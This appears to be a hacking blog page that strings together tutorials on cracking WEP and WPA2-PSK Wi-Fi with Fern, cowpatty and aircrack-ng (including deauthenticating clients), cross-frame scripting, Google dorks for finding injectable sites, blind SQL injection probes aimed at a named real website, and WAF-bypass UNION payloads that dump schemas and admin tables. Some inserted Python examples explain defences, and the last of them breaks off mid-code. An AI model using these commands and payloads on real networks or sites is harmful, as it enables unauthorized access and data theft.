Welcome Fellow Hacker!

Sunday, May 4, 2014

How to Hack WPA/WPA2-PSK using FERN WIFI CRACKER

Automation Using the Fern WiFi Cracker

Just so you know, I still prefer and recommend that you study the other methods to crack WEP as well, using airodump, aireplay, and aircrack.
Why? Because in order to be a good network security professional, you need to KNOW how this stuff works. It's not enough to be able to click a few buttons; we call those people keyboard jockeys or tool monkeys. Understand what's going on under the surface. WiFi hacking software comes and goes, but aircrack, airodump, and aireplay have been around for a long time. They're all quality products, and you should know how each of these three tools works and how they can be used in conjunction with one another for a successful WiFi crack. The Fern WiFi Cracker is an example of fairly new WiFi hacking software that's worth a look.
Fern is a great WiFi cracker to use in a pinch, and it's already included in BackTrack and Kali Linux. However, you can also download Fern's source code right here. We can use Fern to do a WiFi crack against a WEP-encrypted network. Start by launching Fern from the Applications menu button at the top-left corner of the screen.
If you're running Kali Linux:
-Select Applications -> Kali Linux -> Wireless Attacks -> Wireless Tools
If you're running BackTrack:
-Select Applications -> Back Track -> Exploitation Tools -> Wireless Exploitation Tools -> WLAN Exploitation

Launch the Fern WiFi Cracker and Crack WEP

From the menu, click Fern-wifi-cracker to launch the tool.
You should already have your wireless card in monitor mode. If not, see my previous article first.

Click the drop-down menu at the top of Fern and select your wireless adapter from the list. Click OK on any message boxes you get. After a few moments, the message Monitor Mode Enabled on… should appear in green, as seen in the image.
Then click Scan for Access Points.
Fern will scan for WiFi networks in range, and will begin populating the WEP and WPA boxes.


Once the Fern WiFi Cracker finishes scanning for networks, you can select the network you are targeting by finding it in either the WEP section or the WPA section. In this example, I am targeting a WEP-encrypted network with an SSID of Hack-WiFi.




Select your target network from the drop-down box, then click the WiFi Attack button to the right.

The Fern WiFi Cracker will now begin an automated WEP crack against the Hack-WiFi network. This may take some time, so if you need to get some coffee or take a dump, go for it. You'll see a Please Wait… screen for a long time as Fern goes through the process. Remember, Fern is completely automated WiFi hacking software, so there isn't anything left to do at this point but let Fern sniff the WiFi network, authenticate to the device, begin injecting replay traffic, and finally crack WEP.
In my case, the Fern WiFi Cracker didn't succeed until it had captured about 25,000 IVs.
But finally, if everything worked as it should, you'll get the message below:
Congratulations! Another successful audit of a wireless network! As always, be sure to confirm you can connect to the target WiFi network.

Hacking WPA/WPA2-PSK Wireless Network using COWPATTY

As part of my series on hacking Wi-Fi, I want to demonstrate another excellent piece of hacking software for cracking WPA2-PSK passwords. In my last post, we cracked WPA2 using aircrack-ng. In this tutorial, we'll use a piece of software developed by wireless security researcher Joshua Wright called cowpatty (often stylized as coWPAtty). This app simplifies and speeds up the dictionary/hybrid attack against WPA2 passwords, so let's get to it!

Step 1: Find the Cowpatty

Cowpatty is one of the hundreds of pieces of software included in the BackTrack suite. For some reason, it was not placed in the /pentest/wireless directory but was left in the /usr/local/bin directory, so let's navigate there.
  • cd /usr/local/bin
Because cowpatty is in the /usr/local/bin directory and this directory should be in your PATH, we should be able to run it from any directory in BackTrack.

Step 2: Find the Cowpatty Help Screen

To get a brief rundown of the cowpatty options, simply type:
  • cowpatty
BackTrack will provide you a brief help screen. Note that cowpatty requires all of the following:
  • a word list
  • a file where the password hash has been captured
  • the SSID of the target AP

Step 3: Place the Wireless Adapter in Monitor Mode

Just as in cracking with aircrack-ng, we need to put the wireless adapter into monitor mode.
  • airmon-ng start wlan0

Step 4: Start a Capture File

Next, we need to start a capture file where the hashed password will be stored when we capture the 4-way handshake.
  • airodump-ng --bssid 00:25:9C:97:4F:48 -c 9 -w cowcrack mon0
This will start a dump on the selected AP (00:25:9C:97:4F:48) on the selected channel (-c 9) and save the capture, including the handshake, with the file prefix cowcrack (airodump-ng numbers its output, so the first file is cowcrack-01.cap).

Step 5: Capture the Handshake

Now when someone connects to the AP, we'll capture the hash, and airodump-ng will show us it has been captured in the upper right-hand corner.

Step 6: Run the Cowpatty

Now that we have the hash of the password, we can use it with cowpatty and our wordlist to crack the hash.
  • cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2
As you can see in the screenshot above, cowpatty is generating a hash of every word in our wordlist with the SSID as a seed and comparing it to the captured hash. When the hashes match, it displays the password of the AP.

Step 7: Make Your Own Hash

Although running cowpatty can be rather simple, it can also be very slow. The password is hashed with SHA1 using the SSID as a seed (salt). This means that the same password on different SSIDs will generate different hashes, which prevents us from simply using a rainbow table against all APs. Cowpatty must take the password list you provide and compute the hash with the SSID for each word. This is very CPU intensive and slow.
Cowpatty now supports using a pre-computed hash file rather than a plain-text word file, making the cracking of the WPA2-PSK password 1000x faster! Pre-computed hash files are available from the Church of WiFi; they were generated from a 172,000-word dictionary file and the 1,000 most popular SSIDs. As useful as this is, if your SSID is not among those 1,000, the hash list doesn't help us.
In that case, we need to generate our own hashes for our target SSID. We can do this by using an application called genpmk. We can generate our hash file for the "darkcode" wordlist for the SSID "Mandela2" by typing:
  • genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2

Step 8: Using Our Hash

Once we have generated our hashes for the particular SSID, we can crack the password with cowpatty by typing:
  • cowpatty -d hashfile -r dumpfile -s ssid
Here hashfile is the file genpmk wrote (hashes in the example above), dumpfile is the capture holding the handshake (/root/cowcrack-01.cap), and ssid is the target SSID (Mandela2).
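To make the SSID-salting point of Steps 7 and 8 concrete, here is an added Python example; it is not part of the original post and is not cowpatty's or genpmk's code. It derives the WPA2-PSK Pairwise Master Key the way IEEE 802.11i specifies (PBKDF2-HMAC-SHA1, SSID as salt, 4096 iterations, 32-byte output), checks the result against the test vector published in the standard, and shows that the same passphrase on a different SSID yields a different key. The SSID "IEEE2" and the second passphrase are constructed for illustration.

```python
import hashlib

# IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
# This is the "SHA1 with the SSID as a seed" of Step 7, and the per-SSID work
# that genpmk precomputes into a hash file.
PBKDF2_ITERATIONS = 4096
PMK_LEN = 32

# Test vector published in the standard's annex on PSK derivation.
IEEE_TEST_VECTOR = (
    "password",
    "IEEE",
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e",
)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """Compute the PMK exactly as a WPA2-PSK supplicant or AP does from its config."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA2 passphrases are 8 to 63 printable ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("ascii"),
        ssid.encode("utf-8"),
        PBKDF2_ITERATIONS,
        PMK_LEN,
    )


def matches_test_vector() -> bool:
    """Sanity check: our derivation reproduces the standard's published PMK."""
    passphrase, ssid, expected_hex = IEEE_TEST_VECTOR
    return derive_pmk(passphrase, ssid).hex() == expected_hex


def same_passphrase_differs_across_ssids(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """The property behind Step 7: a table of PMKs is bound to the SSID it was built for,
    so a precomputed list for 1,000 common SSIDs says nothing about any other SSID."""
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)


if __name__ == "__main__":
    print("test vector ok:", matches_test_vector())
    print("PMK(password, IEEE)  =", derive_pmk("password", "IEEE").hex())
    print("PMK(password, IEEE2) =", derive_pmk("password", "IEEE2").hex())  # constructed SSID
```

Because the SSID is the salt, a table like the Church of WiFi one is only useful against the SSIDs it was built for, and the 4096 PBKDF2 iterations per candidate are why building a new table for another SSID is slow. For the network owner the consequences are the mirror image: a default or very common SSID is exactly what the precomputed tables cover, so a unique SSID and a long passphrase are what make this whole step expensive for an attacker.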

How to Crack WPA/WPA2-PSK Wireless Connection using Aircrack

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. You can read more about that in my beginner's guide to hacking Wi-Fi.
As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that's very difficult to crack—but not impossible. My beginner's Wi-Fi hacking guide also gives more information on this.
The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.
In this tutorial from our Wi-Fi Hacking series, we'll look at using aircrack-ng and a dictionary attack on the encrypted password after grabbing it in the 4-way handshake. If you're looking for a faster way, I suggest you also check out my article on hacking WPA2-PSK passwords using coWPAtty.

Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Let's start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out this guide. This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type:
  • airmon-ng start wlan0
Note that airmon-ng has renamed your wlan0 adapter to mon0.

Step 2: Capture Traffic with Airodump-Ng

Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
  • airodump-ng mon0
Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

Step 3: Focus Airodump-Ng on One AP on One Channel

Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:
  • airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
  • 08:86:30:74:22:76 is the BSSID of the AP
  • -c 6 is the channel the AP is operating on
  • WPAcrack is the file you want to write to
  • mon0 is the monitoring wireless adapter
As you can see in the screenshot above, we're now focusing on capturing data from one AP with an ESSID of Belkin276 on channel 6. Belkin276 is probably a default SSID; default SSIDs are prime targets for wireless hacking, as users who leave the default ESSID usually don't spend much effort securing their AP.

Step 4: Aireplay-Ng Deauth

In order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let's open another terminal and type:
  • aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
  • 100 is the number of de-authenticate frames you want to send
  • 08:86:30:74:22:76 is the BSSID of the AP
  • mon0 is the monitoring wireless adapter
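Seen from the defender's side of the air, the burst sent in this step is easy to spot: a sensor in monitor mode will log tens of deauthentication frames per second from one BSSID, usually addressed to the broadcast MAC. The following Python example is added here and is not part of the original post or of the aircrack-ng suite; the frame records it runs over are constructed to resemble such a burst, and the window and threshold values are assumptions to tune per environment.

```python
from collections import deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample of 802.11 management-frame records, as a monitor-mode sensor
# might log them: (timestamp_seconds, frame_subtype, bssid, destination_mac).
# The first three are ordinary traffic (one isolated deauth is normal housekeeping);
# then one BSSID "sends" 40 broadcast deauthentication frames in 0.4 seconds, the
# pattern a forged --deauth burst leaves on the air.
SAMPLE_FRAMES = [
    (0.00, "beacon", "00:11:22:33:44:55", BROADCAST),
    (0.10, "probe-resp", "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"),
    (0.30, "deauth", "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"),
] + [(1.0 + i * 0.01, "deauth", "00:11:22:33:44:55", BROADCAST) for i in range(40)]


def detect_deauth_flood(frames, window_s=1.0, threshold=10):
    """Return one alert per BSSID whose deauth count inside a sliding window of
    window_s seconds exceeds threshold (both values are assumptions to tune per site)."""
    recent = {}      # bssid -> timestamps of deauths still inside the window
    alerted = set()  # report each BSSID once per run
    alerts = []
    for ts, subtype, bssid, dst in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        window = recent.setdefault(bssid, deque())
        window.append(ts)
        while ts - window[0] > window_s:      # drop timestamps that fell out of the window
            window.popleft()
        if len(window) > threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({
                "bssid": bssid,
                "first_seen": window[0],
                "count": len(window),
                "broadcast": dst == BROADCAST,  # mass deauth rather than one client
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_FRAMES):
        print(alert)
```

The lasting fix is 802.11w Protected Management Frames, which authenticates deauthentication frames so that a client discards a spoofed one; rate-based detection like this covers the networks and clients that cannot enable it.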

Step 5: Capture the Handshake

In the previous step, we bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Let's go back to our airodump-ng terminal and check to see whether or not we've been successful.
Notice in the top line to the far right, airodump-ng says "WPA handshake." This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!

Step 6: Let's Aircrack-Ng That Password!

Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng on BackTrack, named darkc0de.
We'll now attempt to crack the password by opening another terminal and typing:
  • aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
  • WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
  • /pentest/passwords/wordlists/darkc0de is the absolute path to your password file

How Long Will It Take?

This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. On my dual-core 2.8 GHz Intel processor, it's capable of testing a little over 500 passwords per second. That works out to about 1.8 million passwords per hour. Your results will vary.
When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first and if it's not successful, advance to a larger, more complete password file such as one of these.

Stay Tuned for More Wireless Hacking Guides

Keep coming back, as I promise more advanced methods of hacking wireless in future tutorials. If you haven't seen the other Wi-Fi hacking guides yet, check them out here. Particularly the one on hacking WEP using aircrack-ng and hacking WPA2-PSK passwords using coWPAtty.
And as always, if you have questions on any of this, please ask away in the comments below.

XFS Tutorial (Cross Frame Scripting)



XFS - Cross Frame Scripting

Definition:

A frame whose source is open for an attacker to edit, so that its structure can be partially or fully broken.

Types of XFS:

  • temporary
  • permanent (rare)

Temporary:

In this type of vulnerability the user can only take control of his own side, with a normal redirect (it works only for the tester; the URL remains the same).

Permanent:

In this type the vulnerability comes via the URL and is visible to everyone in the world until it is fixed.



Finding a vulnerable site:

The vulnerability revolves around sites with many iframes, so you need to choose the website wisely. Do not choose a site whose iframes are coded in complete, pure HTML; everything else works!

Things needed:

1) Firefox

Firefox is the best browser for a hacker.

2) Tamper Data add-on

An add-on for Firefox that catches GETs and POSTs, which are the most important thing in XFS.

3) A brain

Huh, you have one, right?

4) Cookie Manager/Editor add-on

Exploiting:
The formula should be:

home page --> sub link --> iframe

Let's take the Chrome download page as an example (just an example; no XFS exists there):

i.e.:

Code:
https://www.google.com/intl/en/chrome/browser/ 

Open up Tamper Data in Firefox.

After that, click Start Tamper!

Click the sub link that directs you to a direct iframe.

Take a notepad and write down all the requests listed in Tamper Data.

i.e. Example:
Code:
12x GETs

5x POSTs

Now make sure it has 1-5 POSTs and the remaining are all GETs.

Now go back in the browser and click again. This time leave all the GETs alone, and whenever you get a POST, edit all of its fields to
Code:
XFS 

Now you need to do some minor editing of the URL to check whether it is XFS or not.

lets try it out :

Code:
x.com/thread-01/view;POST1
Result: Same as original

x.com/thread-01/view;POST2
Result: Same as original

x.com/thread-01/view;POST3
Result: Same as original

x.com/thread-01/view;POST4
Result: Same as original

x.com/thread-01/view;POST5
Result: Broken iframe, we got it!

Voila! We got it.

Now edit the cookie of that page with Cookie Manager. Set it to "POST5".

Now reload the page and see whether the result is the same or not.

It's the same. We got it right!

Now if you want to redirect, use the following code:

Code:
x.com/thread-01/view;POST5;redir.php?=www.google.com 

And if you want a popup, use this code:

Code:
x.com/thread-01/view;POST5;alert("XFS")

Using and Creating SQL DORKS

A method of finding websites vulnerable to SQL injection is using what we call "dorks".
Dorks: they are like search criteria; the search engine returns results related to your dork.
The process can be a little time consuming, but the outcome will be worth it after learning how to use dorks.


For this tutorial, the search engine we'll be using is Google.
Credits to those who are mentioned in this tutorial.
Now I'll show you how to use dorks, with the help of a video too.




Step1: Finding your dorks i.e. the criteria you'll be using
Dork List compiled by kobez-
Code:
http://pastebin.com/0FqmasC7

Dork List by Sidesipe-
Code:
http://pastebin.com/x1rtqktj

Dork List by .Newsletter'
Code:
http://pastebin.com/APxqavu9

For this tutorial, we'll be using this dork "inurl:index.php?id="


Step2: Making use of your Dorks with the help of Google

Here's what you do:
  • Go to http://www.google.com
  • Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
  • Now you'll find a whole lot of links in your results

Here's how you can speed up your process:
Your mouse should have a scroll button (the middle button), right?
Hover over each link and press the scroll button so that it opens in a new tab (let's say you can open about 10 links at a time).


Step3: Vulnerability approach

Now, to see whether the website is vulnerable to SQL injection or not, we simply put a single quote (') at the end of the URL.
So our site will look like this
Code:
http://www.site.com/index.php?id=123'

Do the same thing with the websites you opened in your tabs and see if any of them is vulnerable.

To determine whether a website is vulnerable: it should return an error!

Note: If you can't find any vulnerability after searching on this dork, you can always browse the dork lists I mentioned above and use any of them until you find a website vulnerable to SQL injection.

Hack Website using Blind SQL INJECTION



S0.6 - Blind SQL Injection


Let me start off by saying that blind SQL injection is very time consuming. I honestly don't think anyone would judge you if you used a tool while injecting a site using the blind method. Let's get started anyway. I found a site on which I could use union-based injection, so I wouldn't have to guess the table names, which made this tutorial a lot easier to write.

First of all we will want to find a site using dorks, mentioned earlier in this tutorial. If order by/group by isn't working for you, you could try blind (or error based; I'll make a tutorial for that soon).
When we have our site with a vulnerable parameter, we will want to test whether it is vulnerable. We can do this by adding "and 1=1" onto the end of our URL; if it loads normally, that's good. Now if we add "and 1=2" and get an error, or the page doesn't load normally, it's most likely vulnerable.


Code:
http://www.giacusa.com/news.php?newsid=126 and 1=1
< no error
Code:
http://www.giacusa.com/news.php?newsid=126 and 1=2
< doesn't load properly

It does this because you're either providing a true or false statement. 1=1 is true. 1=2 is false. This is the method we will be using to gather information.
To find the version we will want to use

Code:
and substring(@@version,1,1)=VERSIONHERE

Where we have "VERSIONHERE", you will want to put the version. Most sites would use either 4 or 5. Using what I said earlier, if the version is false, it won't load correctly. If it is true, it will.

Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=4
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=5
< loads fine

So we have established that the version is 5. We will use this method of guessing to find out pretty much all the info, as we would in a union-based injection.
Now to find the tables we will have to guess the names. Since union-based injection works on the site I'm using as an example, I just quickly got the tables/columns that way to keep the tutorial simple. But otherwise you would have to guess. You could use common table names such as admin, user, login, etc. We will use " (SELECT 1 from TABLE limit 0,1)=1 ".

Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test limit 0,1)=1
< page doesn't load correctly.
Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test2 limit 0,1)=1
< page doesn't load correctly.
Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from chapters limit 0,1)=1
< page loads fine. so there is a table named chapters.

Now to find the columns from a table, we will have to use the same method. We will use " (SELECT substring(concat(1,COLUMNNAME),1,1) from TABLENAME limit 0,1)=1 ". So,

Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test1),1,1) from chapters limit 0,1)=1
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test2),1,1) from chapters limit 0,1)=1
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,category),1,1) from chapters limit 0,1)=1
< loads fine. There is a column named category.

After you have done that, here comes the really time consuming part. We will have to guess each letter of the data value, one by one, by its ASCII code. So "test" = "74 65 73 74" in hex. You can find an ASCII chart here - http://www.asciitable.com/. Or you can use the text > hex feature in the HackBar add-on for Firefox. Or use this - http://easycalculation.com/ascii-hex.php.

We will want to use -
Code:
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE

It didn't work on my site for some reason, but I'll explain it anyway. Say user = john.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>64
should load normally, because most sites wouldn't allow "@" in the username, but it's possible. @ = 64 in ASCII. Since it loads normally you know it is greater than 64.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>105
will load normally, because the "j" in john = 106 in ascii.
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>106
will return an error, because "j" is not greater than 106. It is 106. It's like finding columns really. So after we know it is 106 in ascii, we write that down. 106 = j.

Now we will need to find the other letters, so we will change "1,1" to "2,1" which will move one character along.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>110
will load normally, because the "o" in john is greater than 110. It's 111. So

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>111
will return an error because o is equal to 111, not greater. But since you get nothing at 110, you know it's 111. So now you have the first two characters; just keep repeating this until you get an error no matter what, then you will know that you have the full username. Then after you have done that move to a different column, such as password :). Like I said, this can be really time consuming; this is probably one of the only times I'd use a tool personally.
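The "loads or doesn't load" oracle used throughout this post, and the single-quote test from the dorks post above it, both rest on the same coding mistake: the parameter is concatenated into the SQL text. This added Python example (not from the original post; it uses an in-memory SQLite table constructed to stand in for the news table behind news.php) shows the vulnerable query beside its parameterized form and why the oracle disappears once the input is bound as a value instead of spliced into the statement.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the table behind news.php?newsid=..."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (newsid INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO news VALUES (126, 'Quarterly update')")
    return conn


def fetch_news_vulnerable(conn, newsid: str):
    """String concatenation: whatever follows the number becomes part of the SQL,
    so 'and 1=2' changes the result set and a stray quote breaks the parser."""
    return conn.execute("SELECT title FROM news WHERE newsid=" + newsid).fetchone()


def fetch_news_safe(conn, newsid: str):
    """Validate the type, then bind the value; the input can never alter the query."""
    if not newsid.isdigit():
        return None
    return conn.execute(
        "SELECT title FROM news WHERE newsid=?", (int(newsid),)
    ).fetchone()


def page_loads(fetch, conn, newsid: str) -> bool:
    """The oracle the post relies on: True if the page would render a row,
    False on an empty result or on a database error."""
    try:
        return fetch(conn, newsid) is not None
    except sqlite3.Error:
        return False


def oracle_leaks(fetch, conn, newsid: str = "126") -> bool:
    """True when 'and 1=1' and 'and 1=2' give different responses, i.e. the
    boolean inference the post builds on (including the substring probes) works."""
    return page_loads(fetch, conn, newsid + " and 1=1") != page_loads(
        fetch, conn, newsid + " and 1=2"
    )


if __name__ == "__main__":
    db = build_db()
    for name, fetch in (("vulnerable", fetch_news_vulnerable), ("parameterized", fetch_news_safe)):
        print(name, "quote test errors:", not page_loads(fetch, db, "126'"),
              "oracle leaks:", oracle_leaks(fetch, db))
```

With the parameterized query both the quote test and the 1=1/1=2 pair get the same answer, so there is nothing left to infer character by character; the server-side fix is that binding, not hiding the error page (which only turns error-based into blind).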





Resources.

http://hashchecker.de/find.html - Sends the query to a number of MD5 checking sites, saves a lot of time.
http://timwarriner.com/software/md5brute.html - MD5 bruteforcer.
http://itsecteam.com/en/projects/project1_page2.htm - If you're a skid and can't be bothered following a simple tutorial, this is for you.
http://th3-0utl4ws.com/tools/admin-finder/ - Online admin finder.
http://pastebin.com/wsfBfegb - Admin finder, scripted in Perl. By GlaDiaT0R. Supports PHP/CFM/HTML/ASP.
http://www.string-functions.com/string-hex.aspx - String to hexadecimal converter.

Hack Website using SQL INJECTION WAF BYPASS

Ok lets get started.

You have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)

You do the regular command:



Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

The website returns this error message:

[Image: tutorialmessage.jpg]

What you want to do now is use inline comments to comment out the blocked commands, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

And now the website returns this:

[Image: tutorialnumbers.jpg]

Ok, now we will try to add version(), database() and user() in one line, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

The website returns this:

[Image: tutorialmessage.jpg]

We would now like to make "concat" both upper and lower case letters, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62--

The website returns;

[Image: tutorialversion.jpg]

Now for the good part; let's try to find all the databases. Here is the regular syntax:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

But with our new techniques the syntax would look like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

The website returns:

[Image: tutorialdbs.jpg]

Now we would like to get the tables:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.tables where table_schema=database()--

The website returns:

[Image: tutorialmessage.jpg]

Now you have to in some way comment out information_schema or tables, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from /*!information_schema*/.tables where table_schema=database()--

and this returns:

[Image: tutorialtables.jpg]

It's the same to get columns; you know the drill.

If you now want to dump the id column from the admin table, you do it like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 from admin--

Hope you learned something from my tutorial, feel free to ask if you have any questions.

REMEMBER; This is only BASIC WAF bypass, the techniques are endless
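From the WAF author's side, every trick in this post defeats the same weakness: matching raw keywords against the raw request. The following Python example is added here and is not from the original post. It normalizes a request the way the MySQL server will actually read it, decoding it, unwrapping the /*!...*/ versioned comments (whose body MySQL executes), dropping ordinary comments and folding case, and only then applies the rules. The sample query strings are constructed from the post's payloads with the host removed and the column list shortened; the two rule lists are illustrative, not a complete rule set.

```python
import re
from urllib.parse import unquote_plus

# Keyword filter of the kind the post defeats: it matches the raw request text.
NAIVE_PATTERNS = [re.compile(p) for p in (
    r"UNION SELECT",
    r"concat\(",
    r"from information_schema",
)]

# The same intent, applied after normalization (lower case, whitespace squashed).
NORMALIZED_PATTERNS = [re.compile(p) for p in (
    r"\bunion\b.*\bselect\b",
    r"\b(?:group_)?concat\s*\(",
    r"from information_schema",
)]

VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)  # /*!UNION*/ or /*!50000UNION*/
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)               # /* anything */


def normalize(query_string: str) -> str:
    """Rewrite a request into the form MySQL will parse before matching rules on it."""
    s = unquote_plus(query_string)
    s = VERSIONED_COMMENT.sub(r"\1", s)   # MySQL executes the body of /*!...*/, so keep it
    s = PLAIN_COMMENT.sub(" ", s)         # ordinary comments are ignored by the server
    s = re.sub(r"\s+", " ", s).strip()
    return s.lower()


def naive_flags(query_string: str) -> bool:
    return any(p.search(query_string) for p in NAIVE_PATTERNS)


def normalized_flags(query_string: str) -> bool:
    return any(p.search(normalize(query_string)) for p in NORMALIZED_PATTERNS)


# Constructed query strings modelled on the post's payloads.
SAMPLES = {
    "plain":          "id=-182 UNION SELECT 1,2,3,concat(version()),5--",
    "inline_comment": "id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt(version()),5--",
    "schema_comment": "id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5 "
                      "from /*!information_schema*/.tables where table_schema=database()--",
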